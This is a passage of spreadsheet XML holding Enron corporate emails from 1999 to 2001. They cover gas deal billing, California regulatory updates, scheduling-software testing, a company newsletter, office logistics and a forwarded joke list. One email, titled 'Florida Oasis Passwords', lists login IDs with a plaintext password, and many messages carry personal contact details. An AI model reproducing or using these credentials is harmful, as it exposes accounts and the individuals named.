ISO New England Inc._x000D_
One Sullivan Road_x000D_
Holyoke, MA  01040-2841_x000D_
(413) 535-4000_x000D_
mhain@ISO-NE.com</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 04:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mary.ellenberger@enron.com', 'lisa.valderrama@enron.com'})</t>
  </si>
  <si>
    <t>CGAS deal 213360</t>
  </si>
  <si>
    <t xml:space="preserve">Mary &amp; Lisa,_x000D_
Please follow up w/ Chris on his e-mail (redraft.....)._x000D_
_x000D_
Chris,_x000D_
I am now officially in Power.  Please forward all CES related issues to Lisa _x000D_
and Mary.  They are also working w/ the OA team on the o/s issues.  Thanks._x000D_
ajc_x000D_
_x000D_
ajc_x000D_
---------------------- Forwarded by Audrey Cook/HOU/ECT on 12/05/2000 12:35 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
12/05/2000 08:21 AM_x000D_
To: Dick Jenkins/HOU/ECT@ECT, Kimat Singla/HOU/ECT@ECT, Audrey _x000D_
Cook/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CGAS deal 213360_x000D_
_x000D_
There is a demand charge of  $-.22 x 900000 on this deal ticket.  I think the _x000D_
demand charge should be $-.22 x 10,000 x # days on the month.  This equals _x000D_
900,000 over the term of the deal.  I changed the demand charge volume to _x000D_
310,000  for Dec_x000D_
310,000 for Jan_x000D_
280,000 for Feb_x000D_
_x000D_
Audrey, the global contract is 96017642 and 12/2000 is the first month of _x000D_
this deal.  We should receive and invoice from COH for the demand charge.  _x000D_
There is a very slim chance we will be selling COH any gas on this deal for _x000D_
the month.  Would you forward this email to the person that handles COH?_x000D_
_x000D_
Thanks_x000D_
chris_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 12/05/2000 08:08 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
12/04/2000 01:56 PM_x000D_
To: Kimat Singla/HOU/ECT@ECT_x000D_
cc: Victor Lamadrid/HOU/ECT@ECT, Alvin Thompson/Corp/Enron@Enron _x000D_
Subject: CGAS deal 213360_x000D_
_x000D_
ENA has a put to COH (deal 213360) for up to 10,000 dth/day.  This deal was _x000D_
in the system for December and I just took it to 0 for the whole month.  I _x000D_
estimate we should make about $495,000 on the deal change._x000D_
_x000D_
Kimat, this deal also has a demand charge that ENA pays COH for the put.  I _x000D_
believe its in the deal correctly._x000D_
_x000D_
Alvin, please show this on the morning sheet as a "Put to COH at IF" or _x000D_
something real intelligent like that._x000D_
_x000D_
This deal goes thru 2/28/01._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 05:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CA Legislative Summary</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 02/22/2001 01:23 PM -----_x000D_
_x000D_
	John Neslage@ENRON_DEVELOPMENT_x000D_
	02/22/2001 10:37 AM_x000D_
		_x000D_
		 To: Jeff Dasovich/Na/Enron@ENRON_x000D_
		 cc: Aaron Klemm/Western Region/The Bentley Company@Exchange@EES@ENRON, Mike _x000D_
D Smith@EES_x000D_
		 Subject: Re: Regulatory update_x000D_
_x000D_
_x000D_
We are in the process of distilling this list down to its essentials, and _x000D_
when we are done, I will forward it along to the group.  So as not to hold _x000D_
you up, I am attaching a comprehensive list of proposed legislation in both _x000D_
the Assembly and the Senate in California, along with short summary of what _x000D_
each piece of legislation purports to do._x000D_
_x000D_
Thanks-_x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Aug 2001 08:15:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'asem.atta@enron.com'})</t>
  </si>
  <si>
    <t>RE: Testing PSW and Path Confirmation done on 8/23</t>
  </si>
  <si>
    <t xml:space="preserve">Cara,_x000D_
	_x000D_
	Looking at the Stage and Production versions of the deal scheduling application it looks like the stage version has some issues/differences.. [e.g being that check option for cross portfolio deals is in stage and not production release].  This issue will be addressed but the current workaround would be to make sure the checkbox is checked in stage for retrieving proper results.. _x000D_
_x000D_
	Please do let me know if you have any questions/concerns.._x000D_
regards_x000D_
Asem_x000D_
x31700_x000D_
 -----Original Message-----_x000D_
From: 	Semperger, Cara  _x000D_
Sent:	Wednesday, August 29, 2001 09:46 AM_x000D_
To:	Atta, Asem_x000D_
Subject:	RE: Testing PSW and Path Confirmation done on 8/23_x000D_
_x000D_
i did that, and got data.  why would that make a difference?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Atta, Asem  _x000D_
Sent:	Wednesday, August 29, 2001 8:03 AM_x000D_
To:	Semperger, Cara; Bentley, Corry; Poston, David; Smith, Will; Venkataswami, Vishwanatha_x000D_
Subject:	RE: Testing PSW and Path Confirmation done on 8/23_x000D_
_x000D_
Cara,_x000D_
_x000D_
	You are correct, if run with the params you supplied there are no results.. I did go ahead and check the option to 'Include Cross Portfolio Deals' and deals did then show up.. please do try it with that option checked and let me know._x000D_
_x000D_
thanks_x000D_
Asem [Atta, Ase _x000D_
x31700_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Semperger, Cara  _x000D_
Sent:	Tuesday, August 28, 2001 06:15 PM_x000D_
To:	Atta, Asem; Bentley, Corry; Poston, David; Smith, Will; Venkataswami, Vishwanatha_x000D_
Subject:	RE: Testing PSW and Path Confirmation done on 8/23_x000D_
_x000D_
Here is what I am pulling up on the screen_x000D_
_x000D_
 &lt;&lt; File: Deal Selection Criteria.ppt &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Atta, Asem  _x000D_
Sent:	Friday, August 24, 2001 3:59 PM_x000D_
To:	Semperger, Cara_x000D_
Cc:	Venkataswami, Vishwanatha; Smith, Will; Poston, David; Luu, Duong_x000D_
Subject:	RE: Testing PSW and Path Confirmation done on 8/23_x000D_
_x000D_
Cara,_x000D_
_x000D_
	Trying to figure out why Im seeing a discrepancy.. could you please send me a snapshot of the deal criteria screeen from within scheduling so that I can see exactly what critieria it is you are looking under..  really appreciate it.._x000D_
_x000D_
thanks_x000D_
Asem_x000D_
x31700_x000D_
_x000D_
	_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Venkataswami, Vishwanatha  _x000D_
Sent:	Friday, August 24, 2001 07:23 AM_x000D_
To:	Atta, Asem_x000D_
Subject:	FW: Testing PSW and Path Confirmation done on 8/23_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Semperger, Cara  _x000D_
Sent:	Thursday, August 23, 2001 08:05 PM_x000D_
To:	Bentley, Corry; Poston, David; Smith, Will; Venkataswami, Vishwanatha_x000D_
Subject:	Testing PSW and Path Confirmation done on 8/23_x000D_
_x000D_
Good Evening,_x000D_
_x000D_
I wanted to poke around a bit and see if I could find anything quickly so you all could proceed._x000D_
_x000D_
Path Confirmation:_x000D_
_x000D_
I like the new way the confirm box pops up.  _x000D_
_x000D_
Path Cut,_x000D_
_x000D_
I tried to cut a path for 6/21, got through all the usual screens, and added my info,  I got the following error:_x000D_
_x000D_
"Cannot be updated. Key Violation. ORA-00001: unique constraint (PWR.PK_SCHD_PATH_CUTS) violated"  no cut information was saved._x000D_
_x000D_
_x000D_
I still cannot get anything to show up in scheduling.  I tried West Wing for 6/21,  PV for 6/22, and Mid C for 6/23. The software says it is loading deals, but no results are showing in the filter or the schedule screen._x000D_
I have to be able to really test the routing, so  we need to get this resolved.  Most of the routing looked ok, except the deals changed in scheduling would not route and the Physical vs Non-physical flag was not being triggered properly. Because our physical and non-physical volumes are tracked through Enpower and recorded for the WSCC and NERC fees that we pay, this information needs to be correct._x000D_
_x000D_
_x000D_
I will stay late, come in early, or whatever it takes to get things tested.  _x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cara_x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 08:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;Option to Purchase Real Estate re TitanFehr.DOC&gt;&gt;_x000D_
_x000D_
_x000D_
Kay:_x000D_
Per your previous email,  attached is the electronic version of the_x000D_
Titan-Fehr Option for your review.  Please call with any questions.  Thanks!_x000D_
_x000D_
Karen S. Way_x000D_
Piper Marbury Rudnick &amp; Wolfe_x000D_
203 N. LaSalle_x000D_
Chicago, Illinois 60601_x000D_
email:  karen.way@piperrudnick.com_x000D_
(ph) 312-368-2152_x000D_
(fax) 312-630-6347_x000D_
_x000D_
_x000D_
_x000D_
_____________________________________________________________________________x000D_
The e-mail address and domain name of the sender changed on November 1, _x000D_
1999.  Please update your records._x000D_
_x000D_
The information contained in this communication may be confidential, is _x000D_
intended only for the use of the recipient named above, and may be legally _x000D_
privileged.  If the reader of this message is not the intended recipient, you _x000D_
are hereby notified that any dissemination, distribution, or copying of this _x000D_
communication, or any of its contents, is strictly prohibited. If you have _x000D_
received this communication in error, please re-send this communication to _x000D_
the sender and delete the original message and any copy of it from your _x000D_
computer system._x000D_
Thank you._x000D_
_x000D_
For more information about Piper Marbury Rudnick &amp; Wolfe, please visit us at _x000D_
http://www.piperrudnick.com/_x000D_
_____________________________________________________________________________x000D_
_x000D_
 - Option to Purchase Real Estate re TitanFehr.DOC</t>
  </si>
  <si>
    <t>Fri, 7 Sep 2001 13:08:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dustin.collins@enron.com', 'jay.blaine@enron.com', 'punit.rawal@enron.com', 'joe.errigo@enron.com', 'carrie.larkworthy@enron.com', 'brant.reves@enron.com', 'michael.seely@enron.com', 'andrew.greer@enron.com', 'david.maskell@enron.com', 'reese.trejo@enron.com'})</t>
  </si>
  <si>
    <t>Florida Oasis Passwords</t>
  </si>
  <si>
    <t>The following are id's and passwords for FLOASIS_x000D_
_x000D_
jhernandez1_x000D_
ectr_x000D_
_x000D_
mgarcia_x000D_
ectr_x000D_
_x000D_
We should be checking trans. into Florida on a nightly basis.  You should look at the JEA, FPL, FPC and TAL sites.  Look for any trans available for next day on a hourly or daily basis.  Let the morning guys know of any availability during the morning hand-off.  And on the weekends look for it during the days.  If you see that trans is avail. for Monday on Sunday night give Miguel or myself a call(Before 11:00 p.m).  That is all</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 14:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Is New York going the way of California?</t>
  </si>
  <si>
    <t>Read about New York's electricity deregulation in eBiz._x000D_
_x000D_
Also in this issue:_x000D_
Enron's difference of opinion with the Bush Administration_x000D_
A California update_x000D_
Trading ad time at Enron_x000D_
_x000D_
It's all in the latest eBiz.  Go to home.enron.com, click Publications, then _x000D_
click eBiz, and "eBiz March 16, 2001."</t>
  </si>
  <si>
    <t>Tue, 4 Jan 2000 09:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EOL Credit Responses 1/4</t>
  </si>
  <si>
    <t>Please find attached Credit's EOL responses for 1/4/00._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Molly</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 04:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pmains@n2h2.com'})</t>
  </si>
  <si>
    <t>Hey Mark,_x000D_
_x000D_
Sorry for not contacting you sooner regarding the Vegas trek.  I had planned_x000D_
on heading to Los Angeles for that weekend to visit a buddy.  He is now_x000D_
moving into a new house with his girlfriend this weekend and will be busy_x000D_
with that._x000D_
_x000D_
Doesn't look like I will be heading to Vegas now either.  I guess that I_x000D_
will spend the weekend helping Dahl try to get that scow of his pieced back_x000D_
together.  What a project that has evolved into._x000D_
_x000D_
I plan on watching the game at my bro's bar.  Not quite Cesar's Palace or_x000D_
MGM, but it will have to do..._x000D_
_x000D_
Have a great time!  I hope you make it back in one piece.  You will have to_x000D_
give me some of the good details when you get back._x000D_
_x000D_
Good luck,_x000D_
_x000D_
Patrick Mains_x000D_
pmains@n2h2.com_x000D_
206.834.1781</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 10:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>DRAFT presentation--Status report on California</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 04/02/2001 05:25 PM -----_x000D_
_x000D_
	Jeff Dasovich_x000D_
	Sent by: Jeff Dasovich_x000D_
	03/25/2001 05:37 PM_x000D_
		 _x000D_
		 To: Richard Shapiro/NA/Enron@Enron, James D Steffes/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: DRAFT presentation--Status report on California_x000D_
_x000D_
Attached is the draft that we've discussed.  Few points:_x000D_
_x000D_
It's a draft.  It would benefit from more tinkering._x000D_
It takes our core messages (what's the problem?  what's the solution?) and _x000D_
tries to weave in current events, understanding that by the time you're _x000D_
giving the presentation it may need to be further modified to correspond with _x000D_
rapidly changing circumstances and events._x000D_
It's frank but (hopefully) measured in describing the mess that is _x000D_
California.  It's set up so that it's easy to modify the more pointed _x000D_
statements._x000D_
Leaves plenty of room for you to tailor the presentation to particular points _x000D_
that you'd like to make, or data and/or information that you'd like to _x000D_
include._x000D_
I didn't have ready access to charts and graphs to back up the stats used in _x000D_
the text of the presentation, but I'm sure that it will be relatively easy _x000D_
for someone in Houston to pull that together (e.g., may want to poach a bit _x000D_
from Belden's presentation to include some PNW hydro stats (which I've also _x000D_
attached), or from ISO website to show load-resource balance info)._x000D_
Though I'll be on vacation, I'll be checking in on voicemail and email, so if _x000D_
you have any questions, or need something additional to get the presentation _x000D_
ready, just let me know._x000D_
I may be in an airplane on Monday during both the leadership call and the _x000D_
newly restructured California call.  Otherwise, I'll be trying to make those _x000D_
calls dailywhile I'm away. _x000D_
And Jim, I'll also be available to participate in any calls regarding _x000D_
Calger's proposed deal with CDWR._x000D_
Finally, when the darn thing prints out, it prints borders around the _x000D_
heading/title box and the text box, though I don't know why.  Tried just _x000D_
about everything to get rid of them.  May want to have a PP guru in Houston _x000D_
see if (s)he can disable the boders._x000D_
Best,_x000D_
Jeff_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 14:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'katesymes@microsoft.com'})</t>
  </si>
  <si>
    <t>NAFTA Analysis</t>
  </si>
  <si>
    <t>?_x000D_
_x000D_
?_x000D_
ftp://csf.colorado.edu/ipe/Thematic_Archive/documents/nafta/nafta_analysis/cbi_x000D_
.nafta.analysis_x000D_
 - cbi.nafta.analysis.url</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 02:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>offsite agenda</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 07/26/2000 _x000D_
09:13 AM ---------------------------_x000D_
_x000D_
_x000D_
Zimin Lu_x000D_
07/26/2000 09:06 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: offsite agenda_x000D_
_x000D_
_x000D_
_x000D_
Here is my agenda for the offsite._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Aug 1999 09:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joya.davis@enron.com', 'travis.mccullough@enron.com', 'robin.jordan@enron.com', 'stuart.zisman@enron.com', 'becky.tlucek@enron.com', 'karen.jones@enron.com', 'lance.legal@enron.com', 'janice.moore@enron.com', 'sandi.braband@enron.com', 'kaye.ellis@enron.com', 'brenda.whitehead@enron.com', 'taffy.milligan@enron.com', 'genia.fitzgerald@enron.com', 'jeffrey.hodge@enron.com', 'bob.carter@enron.com', 'doug.pedigo@enron.com', 'susan.bailey@enron.com', 'wende.warren@enron.com', 'linda.simmons@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'linda.noske@enron.com', 'peggy.banczak@enron.com', 'dale.rasmussen@enron.com', 'cynthia.harkness@enron.com', 'sheila.tweed@enron.com', 'ann.white@enron.com', 'chaundra.woods@enron.com', 'richard.sanders@enron.com', 'roger.balog@enron.com', 'erica.braden@enron.com', 'eric.gillaspie@enron.com', 'janet.moore@enron.com', 'teresa.bushman@enron.com', 'barbara.gray@enron.com', 'elizabeth.sager@enron.com', 'sylvia.sauseda@enron.com', 'barton.clark@enron.com', 'shonnie.daniel@enron.com', 'lou.stoler@enron.com', 'mark.taylor@enron.com', 'jenny.helton@enron.com', 'mark.haedicke@enron.com', 'stacy.dickson@enron.com', 'monica.jordan@enron.com', 'robert.walker@enron.com', 'ed.iii@enron.com', 'dan.hyvl@enron.com', 'dan.lyons@enron.com', 'kay.young@enron.com', 'sara.shackleton@enron.com', 'pat.radford@enron.com', 'susan.flynn@enron.com', 'shari.stack@enron.com', 'gerald.nemec@enron.com', 'chris.gaffney@enron.com', 'carol.kincannon@enron.com', 'joyce.dorsey@enron.com', 'wayne.gresham@enron.com', 'jan.king@enron.com', 'merrill.haas@enron.com', 'gareth.bahlmann@enron.com', 'mary.heinitz@enron.com', 'shawna.flynn@enron.com', 'marie.heard@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'kristina.mordaunt@enron.com', 'michael.robison@enron.com', 'tana.jones@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'alan.aronowitz@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'peter.vecchio@enron.com', 'steve.hooser@enron.com', 'linda.guinn@enron.com', 'mary.cook@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>Authorization Memos</t>
  </si>
  <si>
    <t xml:space="preserve">Please see attached memo from Julia regarding the formation of corporations, _x000D_
LLCs and partnerships.  Thanks, Deb_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Jun 2000 10:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Lunch For Rod Nelson</t>
  </si>
  <si>
    <t xml:space="preserve">Suzanne:_x000D_
Marie is included.  Let's see how everyone else responds and hope that we can _x000D_
choose Mon, Tues or Wed.  I would prefer Mon or Tuesday because I see the _x000D_
doctor on Wed but let's see what works for everyone else._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Suzanne Adams_x000D_
	06/16/2000 05:05 PM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Lunch For Rod Nelson_x000D_
_x000D_
_x000D_
----- Forwarded by Suzanne Adams/HOU/ECT on 06/16/2000 05:05 PM -----_x000D_
_x000D_
	Marie Heard@ENRON COMMUNICATIONS_x000D_
	06/16/2000 04:54 PM_x000D_
		 _x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Lunch For Rod Nelson_x000D_
_x000D_
Am I really included in this lunch?  If so, I will be out Thursday and _x000D_
Friday, June 29 and 30._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie Heard_x000D_
Senior Legal Specialist_x000D_
Enron Broadband Services_x000D_
Phone:  (713) 853-3907_x000D_
Fax:  (713) 646-8537_x000D_
Marie_Heard@Enron.net_x000D_
----- Forwarded by Marie Heard/Enron Communications on 06/16/00 04:56 PM -----_x000D_
_x000D_
	Carol St Clair@ECT_x000D_
	06/16/00 03:57 PM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Shari _x000D_
Stack/HOU/ECT@ECT, Jason Peters/Corp/Enron@Enron, Susan Flynn/HOU/ECT@ECT, _x000D_
Susan Bailey/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Tana _x000D_
Jones/HOU/ECT@ECT, Marie Heard/Enron Communications@Enron Communications_x000D_
		 cc: Suzanne Adams/HOU/ECT@ECT_x000D_
		 Subject: Lunch For Rod Nelson_x000D_
_x000D_
Group:_x000D_
Mark has okay'ed having a going away lunch for Rod.  Looks like the week of _x000D_
June 26th works best for Rod.  Please e-mail Suzanne Adams by Monday of next _x000D_
week any days that week that do not work for you so we can pick a date.  _x000D_
Thanks._x000D_
Carol_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 13:38:04 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: BTS</t>
  </si>
  <si>
    <t xml:space="preserve">Thinking about both nights...but I do work day shifts those days...for sure on the 15th_x000D_
Deano_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cox, Chip  _x000D_
Sent:	Wednesday, October 31, 2001 9:09 AM_x000D_
To:	Dean, Craig_x000D_
Subject:	BTS_x000D_
_x000D_
are you planning on going to BTS? if so what night are you going to go? they're coming Nov. 14 &amp; 15th. </t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 10:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>BUSINESS HIGHLIGHTS_x000D_
_x000D_
TRANSACTION DEVELOPMENT_x000D_
Transaction Development, headed by Rodney Malcolm, works with Pulp &amp; Paper,=_x000D_
=20_x000D_
Lumber and Steel to structure and execute some of the more complex deals. =_x000D_
=20_x000D_
Members of the Transaction Development team have a strong track record of=_x000D_
=20_x000D_
closing structured transactions involving both capital and commodity risks.=_x000D_
 =20_x000D_
Sample deals would include working on the acquisition of Garden State Paper=_x000D_
=20_x000D_
earlier this year, and structuring and pitching the first all requirements,=_x000D_
=20_x000D_
index based, physical steel supply contract to one of the largest players i=_x000D_
n=20_x000D_
the steel servicing segment of the steel industry._x000D_
_x000D_
The ability to buy and sell physical product will be critical to creating a=_x000D_
=20_x000D_
commodity product in these businesses.  Getting access to the physical=20_x000D_
product will require creating compelling financing structures, as well as=_x000D_
=20_x000D_
potentially buying assets to get control of their production capability.  I=_x000D_
n=20_x000D_
all these situations, the Transaction Development team will be a key player=_x000D_
=20_x000D_
in driving these opportunities to closure._x000D_
_x000D_
_x000D_
PEP - REVIEWER FEEDBACK DEADLINE_x000D_
The Year End 2000 Performance Review Process closes November 17. To access=_x000D_
=20_x000D_
PEP, go to http://pep.corp.enron.com.  To avoid system delays, please log-o=_x000D_
n=20_x000D_
before the deadline._x000D_
_x000D_
If you have any problems accessing the system or have any questions regardi=_x000D_
ng=20_x000D_
the Performance Management Process, please call the HR Helpdesk at x3.4040=_x000D_
=20_x000D_
option 4 or email pep.enquiries@enron.com._x000D_
=20_x000D_
_x000D_
OPEN ENROLLMENT 2001_x000D_
The final date for making your 2001 benefit elections or changes is Novembe=_x000D_
r=20_x000D_
15, 8:00 am CST to 5:00 pm CST.  Remember, that your current 2000 health=20_x000D_
benefit elections will rollover for 2001 if you do not make any changes._x000D_
_x000D_
Log-on to www.enron.benefitsnow.com or call 1-800-425-5864._x000D_
_x000D_
_x000D_
WELCOME_x000D_
_x000D_
New Hires ENA/EIM/EGM_x000D_
ENA =01) Tamara Carter/Gas Logistics, Albert Escamilla/Global Counterparty,=_x000D_
=20_x000D_
Michael Girraratano/Gas Assets Operations, Cassandra Mayeux/Reporting,=20_x000D_
Planning Accounting, Christina Perez/Power Plant Acct., Eve Puckett/Info &amp;=_x000D_
=20_x000D_
Records Management, Tracey Wood/Gas Logistics_x000D_
_x000D_
EGM =01) David Hoog/GRM Risk Products, Judy/Currency Trading_x000D_
_x000D_
_x000D_
SAVE THE DATE_x000D_
_x000D_
ENA/EIM/EGM-HOLIDAY PARTY_x000D_
Enron Field_x000D_
Saturday, December 9_x000D_
7:00 pm - Midnight_x000D_
_x000D_
_x000D_
NUGGETS &amp; NOTES_x000D_
_x000D_
"Bigger, faster" - Dave Delainey/CEO-ENA_x000D_
_x000D_
"Four bid at five. What do you want to do?" John Arnold, Vice=20_x000D_
President-Financial/Nymex Trading_x000D_
_x000D_
"We trade weather."  Gary Taylor, Manager - Weather Risk Management Group_x000D_
"You trade WHAT?!" anyone Gary speaks with._x000D_
_x000D_
_x000D_
LEGAL STUFF_x000D_
_x000D_
The information contained in this newsletter is confidential and proprietar=_x000D_
y=20_x000D_
to Enron Corp. and its subsidiaries.  It is intended for internal use only=_x000D_
=20_x000D_
and should not be disclosed outside of Enron.</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 09:17:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Candidate</t>
  </si>
  <si>
    <t xml:space="preserve">sounds good...._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Presto, Kevin M.  _x000D_
Sent:	Monday, October 15, 2001 11:02 AM_x000D_
To:	Suarez, John_x000D_
Subject:	RE: Candidate_x000D_
_x000D_
Resume looks impressive.   We should definitely interview him.   I forwarded e-mail to Louise to see if she knows the guy from her London gas trading days._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Suarez, John  _x000D_
Sent:	Monday, October 15, 2001 9:15 AM_x000D_
To:	Presto, Kevin M._x000D_
Subject:	Candidate_x000D_
_x000D_
Kevin,_x000D_
_x000D_
I have worked with this guy at EBS for the past year and think he is a good candidate for the group.  He has worked for Marcello Romano (he has a favorable view of him also).  He traded oil products at Goldman a few years back and is interested in coming to the U.S. from our London office.  _x000D_
_x000D_
Let me know what you think.  Perhaps Louise can weigh in also if she knows him.  _x000D_
_x000D_
John _x000D_
_x000D_
 &lt;&lt; File: Tim Whyte CV.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 14 Feb 2000 08:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Purchase of License for software</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all!_x000D_
_x000D_
Please order Visual Studio (Visual Basics and C++) for Chonawee Supatgiat_x000D_
a new Manager with the Research Group._x000D_
_x000D_
The information you will need to order this package is as follows:_x000D_
_x000D_
Co. #:   0011_x000D_
RC#:   100038_x000D_
Head of Research_x000D_
Department:  Vince Kaminski_x000D_
Name:   Chonawee Supatgiat_x000D_
Title:   Manager_x000D_
Location:  EB 1942_x000D_
Phone:   5-8756_x000D_
_x000D_
If you need anything else, please let me know._x000D_
_x000D_
Thanks and have a great day!_x000D_
_x000D_
Shirley_x000D_
3-5290_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jan 2000 09:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: platitudes</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 01/13/2000 05:31 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ami Chokshi @ ENRON                           01/13/2000 04:45 PM_x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: platitudes  _x000D_
_x000D_
i just call it like i see it. am i wrong?_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Eric Bass @ ECT                           01/13/2000 02:49 PM_x000D_
	_x000D_
_x000D_
To: Ami Chokshi/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: platitudes  _x000D_
_x000D_
direct, are we?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ami Chokshi @ ENRON                           01/13/2000 10:59 AM_x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: platitudes  _x000D_
_x000D_
are you flirting with me?_x000D_
_x000D_
a_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Eric Bass @ ECT                           01/13/2000 10:23 AM_x000D_
	_x000D_
_x000D_
To: Ami Chokshi/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: platitudes  _x000D_
_x000D_
You hated that e-mail didn't you?  Miss Sarcasm!_x000D_
_x000D_
e_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ami Chokshi @ ENRON                           01/13/2000 10:14 AM_x000D_
	_x000D_
_x000D_
To: "Yunakov, Chris" &lt;CYunakov@coral-energy.com&gt;, ETrainor@DePelchin.org, _x000D_
keri.steward@ac.com, aparikh98@juno.com, Eric Bass/HOU/ECT@ECT, _x000D_
brooke-doyle@excite.com_x000D_
cc:  _x000D_
Subject: platitudes_x000D_
_x000D_
_x000D_
-_x000D_
_x000D_
    1.Do not walk behind me, for I may not lead.  Do not walk ahead of me,_x000D_
for I may not follow. Do not walk beside me, either. Just leave me the hell_x000D_
alone._x000D_
_x000D_
    2.The journey of a thousand miles begins with a broken fan belt and a_x000D_
leaky tire._x000D_
_x000D_
    3.It's always darkest before dawn. So if you're going to steal the_x000D_
neighbor's newspaper, that's the time to do it._x000D_
_x000D_
    4.Sex is like air; it's not important unless you aren't getting any._x000D_
_x000D_
    5.We are born naked, wet, and hungry. Then things get worse._x000D_
_x000D_
    6.No one is listening until you make a mistake._x000D_
_x000D_
    7.Always remember you're unique, just like everyone else._x000D_
_x000D_
    8.Never test the depth of the water with both feet._x000D_
_x000D_
    9.It may be that your sole purpose in life is simply to serve as a_x000D_
warning to others._x000D_
_x000D_
    10.It is far more impressive when others discover your good qualities_x000D_
without your help._x000D_
_x000D_
    11.If you think nobody cares if you're alive, try missing a couple of car_x000D_
payments._x000D_
_x000D_
    12.If you tell the truth you don't have to remember anything._x000D_
_x000D_
    13.If you lend someone $20, and never see that person again;it was_x000D_
probably worth it._x000D_
_x000D_
    14.Give a man a fish and he will eat for a day.  Teach him how to fish,_x000D_
and he will sit in a  boat and drink beer all day._x000D_
_x000D_
    15.If you drink, don't park. Accidents cause people._x000D_
_x000D_
